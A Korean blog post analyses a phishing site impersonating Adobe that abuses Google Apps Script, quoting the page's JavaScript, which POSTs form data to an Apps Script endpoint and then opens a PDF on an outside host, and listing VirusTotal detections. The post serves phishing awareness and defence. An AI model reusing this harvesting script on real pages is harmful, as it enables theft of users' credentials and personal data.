꿈을꾸는 파랑새

Google Apps Script(구글 앱 스크립트) 이라는 것은 구글 워크스페이스 플랫폼에서 가벼운 애플리케이션 개발을 위해 구글이 개발한 스크립팅 플랫폼 입니다. 이를 악용을 하는 피싱 사이트 
https://pdf-27e04.web(.)app/에 대해 한번 글을 적어 보겠습니다.
일단 해당 사이트에 접속하면 어도비에서 관리하는 사이트로 돼 있지만 실제로는 어도비가 아니고 어도비 계정을 탈취하기 위해서 제작을 한 것이 아닐까 생각이 되지만 가짜 번호를 넣고 로그인을 해보면 PDF 관련 내용을 보면 송장이 비슷한 것이 있는 것을 확인할 수가 있었습니다

Google Apps Script 를 악용한 피싱 사이트
Google Apps Script 를 악용한 피싱 사이트

일단 웹 소스를 보면 다음과 같이 항목이 존재하는 것을 볼 수가 있습니다.

<script type="text/javascript">


	  const scriptURL = 'https://script.google(.)com/macros/s/AKfycbzvKjnCcnAkYgMb9RXPYnLHVj2Owf36SZn4WHbLngFdrMCpIbu0AO5EjDdvyLEO41I/exec'
            const form = document.forms['google-sheet']
          
            form.addEventListener('submit', e => {
              e.preventDefault()
              fetch(scriptURL, { method: 'POST', body: new FormData(form)})
    .then(() => {
      const redirectUrl = 'http://members.optusnet(.)com.au/blaircastle2/TT.pdf';
      const link = document.createElement('a');
      link.href = redirectUrl;
      link.click();
    })
    .catch((error) => console.error('Error!', error.message));
            })
  </script>

Google Apps Script 를 악용한 피싱 사이트 웹 소스
Google Apps Script 를 악용한 피싱 사이트 웹 소스

즉 개인정보를 입력하면   http://members.optusnet(.)com.au/blaircastle2/TT.pdf 라는 PDF 파일을 열게 돼 있는 것을 볼 수가 있으며 해당 사이트에 접속하면 보안 제품과 브라우저에서 제공하는 피싱 사이트 차단에서 차단이 정상적으로 되는 것을 볼 수가 있습니다.
그리고 HTTP Debugger Pro로 보면 다음과 같이 개인정보가 전송된 것을 확인할 수가 있습니다.

Google Apps Script 를 악용한 피싱 사이트 개인정보 전송
Google Apps Script 를 악용한 피싱 사이트 개인정보 전송

VirusTotal 2022-04-26 10:18:09 UTC 기준으로 탐지하는 업체들은 다음과 같습니다.
BitDefender:Phishing
Emsisoft:Phishing
ESET:Phishing
G-Data:Phishing
Lionic:Phishing
Netcraft:Malicious
Phishtank:Phishing
Sophos:Malware
Trustwave:Phishing
Webroot:Malicious
Certego:Suspicious
대부분 피싱로 정상적으로 탐지하고 있으며 기본적으로 백신 프로그램과 브라우저에서 제공하는 피싱 사이트 차단 기능을 활성화해서 사용을 해야 하면 함부로 링크를 클릭하는 것을 자제하는 것을 권장합니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band